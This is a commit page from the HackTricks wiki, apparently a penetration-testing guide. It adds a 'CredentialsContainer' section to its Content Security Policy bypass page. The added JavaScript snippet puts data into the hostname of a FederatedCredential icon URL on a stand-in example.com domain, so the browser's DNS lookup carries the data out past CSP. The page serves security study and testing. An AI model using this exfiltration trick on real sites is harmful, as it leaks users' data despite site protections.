Merge pull request #1005 from satoki/master

Add CSP Exfiltration Bypass Technic by CredentialsContainer
HackTricks-wiki · Jan 26, 2025 · 7947c54 · 7947c54
2 parents db32976 + 2425ea7
commit 7947c54
Showing 1 changed file with 16 additions and 0 deletions.
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```
 
+### CredentialsContainer
+
+The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost.
+
+```javascript
+navigator.credentials.store(
+  new FederatedCredential({
+    id:"satoki", 
+    name:"satoki", 
+    provider:"https:"+your_data+"example.com", 
+    iconURL:"https:"+your_data+"example.com"
+    })
+  )
+```
+
+
 ## Checking CSP Policies Online
 
 - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)